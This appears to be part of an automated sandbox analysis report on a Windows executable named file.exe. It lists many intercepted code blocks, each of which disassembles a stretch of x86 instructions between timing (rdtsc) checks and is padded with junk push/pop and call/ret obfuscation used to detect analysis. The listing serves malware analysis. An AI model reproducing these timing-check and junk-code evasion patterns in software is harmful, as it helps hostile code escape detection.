      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62F7CC second address: 62F852 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC7C5219A5Fh 0x00000008 jmp 00007FC7C5219A60h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 jnl 00007FC7C5219A56h 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ebx 0x0000001e call 00007FC7C5219A58h 0x00000023 pop ebx 0x00000024 mov dword ptr [esp+04h], ebx 0x00000028 add dword ptr [esp+04h], 0000001Dh 0x00000030 inc ebx 0x00000031 push ebx 0x00000032 ret 0x00000033 pop ebx 0x00000034 ret 0x00000035 sub dword ptr [ebp+122D1AEBh], esi 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push edi 0x00000040 call 00007FC7C5219A58h 0x00000045 pop edi 0x00000046 mov dword ptr [esp+04h], edi 0x0000004a add dword ptr [esp+04h], 00000014h 0x00000052 inc edi 0x00000053 push edi 0x00000054 ret 0x00000055 pop edi 0x00000056 ret 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b jng 00007FC7C5219A56h 0x00000061 push eax 0x00000062 pop eax 0x00000063 popad 0x00000064 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62C84E second address: 62C858 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC7C474F63Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62C858 second address: 62C869 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007FC7C5219A58h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62C869 second address: 62C873 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FC7C474F636h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62C873 second address: 62C877 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 630441 second address: 63047A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a jbe 00007FC7C474F645h 0x00000010 jmp 00007FC7C474F63Fh 0x00000015 clc 0x00000016 push 00000000h 0x00000018 mov si, D6B0h 0x0000001c xchg eax, ebx 0x0000001d pushad 0x0000001e push edi 0x0000001f jmp 00007FC7C474F63Bh 0x00000024 pop edi 0x00000025 push eax 0x00000026 push edx 0x00000027 push edi 0x00000028 pop edi 0x00000029 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6351E1 second address: 63527C instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC7C5219A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FC7C5219A61h 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007FC7C5219A64h 0x00000016 nop 0x00000017 clc 0x00000018 jg 00007FC7C5219A57h 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ebp 0x00000023 call 00007FC7C5219A58h 0x00000028 pop ebp 0x00000029 mov dword ptr [esp+04h], ebp 0x0000002d add dword ptr [esp+04h], 00000017h 0x00000035 inc ebp 0x00000036 push ebp 0x00000037 ret 0x00000038 pop ebp 0x00000039 ret 0x0000003a mov dword ptr [ebp+12455EC0h], esi 0x00000040 and di, 46E9h 0x00000045 push 00000000h 0x00000047 push 00000000h 0x00000049 push edi 0x0000004a call 00007FC7C5219A58h 0x0000004f pop edi 0x00000050 mov dword ptr [esp+04h], edi 0x00000054 add dword ptr [esp+04h], 00000018h 0x0000005c inc edi 0x0000005d push edi 0x0000005e ret 0x0000005f pop edi 0x00000060 ret 0x00000061 mov dword ptr [ebp+12455BE7h], ecx 0x00000067 mov edi, 41BF9FE4h 0x0000006c push eax 0x0000006d push eax 0x0000006e push edx 0x0000006f pushad 0x00000070 pushad 0x00000071 popad 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63184E second address: 631854 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63527C second address: 635281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63709B second address: 6370A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6381DD second address: 6381F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC7C5219A56h 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6381F0 second address: 6381F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6381F4 second address: 6381FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63A1BA second address: 63A207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ebx 0x00000009 call 00007FC7C474F638h 0x0000000e pop ebx 0x0000000f mov dword ptr [esp+04h], ebx 0x00000013 add dword ptr [esp+04h], 00000016h 0x0000001b inc ebx 0x0000001c push ebx 0x0000001d ret 0x0000001e pop ebx 0x0000001f ret 0x00000020 jno 00007FC7C474F63Ch 0x00000026 push 00000000h 0x00000028 mov dword ptr [ebp+122D298Ch], eax 0x0000002e push 00000000h 0x00000030 mov di, bx 0x00000033 xchg eax, esi 0x00000034 pushad 0x00000035 pushad 0x00000036 pushad 0x00000037 popad 0x00000038 push ecx 0x00000039 pop ecx 0x0000003a popad 0x0000003b push eax 0x0000003c push edx 0x0000003d ja 00007FC7C474F636h 0x00000043 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 663E7F second address: 663E9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7C474F648h 0x00000009 popad 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 663FF3 second address: 664011 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FC7C5219A62h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 664011 second address: 66402E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C474F641h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007FC7C474F636h 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66402E second address: 664064 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FC7C5219A67h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push esi 0x0000000d jmp 00007FC7C5219A5Dh 0x00000012 push eax 0x00000013 push edx 0x00000014 jno 00007FC7C5219A56h 0x0000001a push edx 0x0000001b pop edx 0x0000001c rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 664064 second address: 664068 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6641CA second address: 6641D8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jp 00007FC7C5219A56h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6641D8 second address: 6641DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6641DE second address: 6641E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6641E2 second address: 664202 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FC7C474F643h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 664202 second address: 664221 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC7C5219A56h 0x00000008 ja 00007FC7C5219A56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC7C5219A5Dh 0x00000017 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66452D second address: 664538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC7C474F636h 0x0000000a pop eax 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 664538 second address: 664549 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7C5219A5Dh 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 664549 second address: 66454D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66454D second address: 664553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6646A0 second address: 6646AA instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC7C474F636h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6646AA second address: 6646B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6646B0 second address: 6646B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 664807 second address: 66480D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6709AB second address: 6709C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7C474F645h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 670E31 second address: 670E37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6710E9 second address: 6710EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 671354 second address: 67135A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 674141 second address: 674145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6742D2 second address: 6742D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67460D second address: 674613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 674613 second address: 674617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 674617 second address: 674629 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC7C474F636h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007FC7C474F636h 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676F9D second address: 676FB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FC7C5219A5Dh 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676FB2 second address: 676FE1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FC7C474F63Ah 0x00000008 jmp 00007FC7C474F647h 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 jns 00007FC7C474F636h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 676FE1 second address: 676FE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DC14F second address: 5DC153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67DD8B second address: 67DD8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67C81B second address: 67C868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7C474F649h 0x00000009 popad 0x0000000a pushad 0x0000000b js 00007FC7C474F636h 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FC7C474F63Ch 0x00000018 jmp 00007FC7C474F646h 0x0000001d popad 0x0000001e push edi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67C982 second address: 67C98D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67C98D second address: 67C9B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC7C474F636h 0x0000000a jmp 00007FC7C474F63Fh 0x0000000f popad 0x00000010 js 00007FC7C474F642h 0x00000016 push edi 0x00000017 pop edi 0x00000018 jmp 00007FC7C474F63Ah 0x0000001d rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 625946 second address: 6259FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FC7C5219A5Bh 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007FC7C5219A58h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 add dx, 8FD6h 0x0000002b mov ebx, dword ptr [ebp+124849FDh] 0x00000031 push 00000000h 0x00000033 push ebp 0x00000034 call 00007FC7C5219A58h 0x00000039 pop ebp 0x0000003a mov dword ptr [esp+04h], ebp 0x0000003e add dword ptr [esp+04h], 00000019h 0x00000046 inc ebp 0x00000047 push ebp 0x00000048 ret 0x00000049 pop ebp 0x0000004a ret 0x0000004b mov dword ptr [ebp+122D38A6h], esi 0x00000051 add eax, ebx 0x00000053 call 00007FC7C5219A5Eh 0x00000058 add dx, B24Ch 0x0000005d pop ecx 0x0000005e push eax 0x0000005f jne 00007FC7C5219A60h 0x00000065 mov dword ptr [esp], eax 0x00000068 jmp 00007FC7C5219A5Dh 0x0000006d push 00000004h 0x0000006f movsx edx, dx 0x00000072 push eax 0x00000073 pushad 0x00000074 push eax 0x00000075 push edx 0x00000076 jmp 00007FC7C5219A62h 0x0000007b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6259FC second address: 625A05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67D16E second address: 67D172 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67D172 second address: 67D18B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jmp 00007FC7C474F63Fh 0x0000000e pop edi 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 680F86 second address: 680F98 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC7C5219A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007FC7C5219A56h 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 680F98 second address: 680FAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C474F640h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 680CBB second address: 680CBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EE6AB second address: 5EE6B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68524F second address: 685255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 685255 second address: 68525D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68525D second address: 685263 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 685263 second address: 685267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68D8A4 second address: 68D8D9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FC7C5219A71h 0x0000000c jmp 00007FC7C5219A5Ch 0x00000011 jmp 00007FC7C5219A5Fh 0x00000016 push eax 0x00000017 jl 00007FC7C5219A56h 0x0000001d pop eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push edx 0x00000021 pop edx 0x00000022 push edx 0x00000023 pop edx 0x00000024 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68BC40 second address: 68BC4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC7C474F636h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68BF36 second address: 68BF41 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jne 00007FC7C5219A56h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68C56F second address: 68C573 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68C573 second address: 68C58E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7C5219A65h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68C58E second address: 68C594 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68C594 second address: 68C598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68D07C second address: 68D089 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC7C474F636h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68D5FB second address: 68D600 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68D600 second address: 68D606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 694757 second address: 69475C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69475C second address: 694771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d jc 00007FC7C474F638h 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69F72C second address: 69F738 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007FC7C5219A56h 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69FB50 second address: 69FB5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69FB5B second address: 69FB77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC7C5219A5Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69FB77 second address: 69FB8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7C474F643h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69FB8E second address: 69FB9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007FC7C5219A56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69FE39 second address: 69FE3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69FE3D second address: 69FE54 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007FC7C5219A5Ch 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 69FE54 second address: 69FE69 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FC7C474F640h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A02A4 second address: 6A02D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7C5219A61h 0x00000009 popad 0x0000000a jp 00007FC7C5219A62h 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A02D1 second address: 6A02EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC7C474F643h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A5701 second address: 6A5715 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jp 00007FC7C5219A56h 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A5715 second address: 6A5719 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A5719 second address: 6A572C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007FC7C5219A56h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A572C second address: 6A5751 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C474F649h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A974B second address: 6A9764 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jnc 00007FC7C5219A56h 0x0000000c jbe 00007FC7C5219A56h 0x00000012 jnl 00007FC7C5219A56h 0x00000018 popad 0x00000019 rdtsc
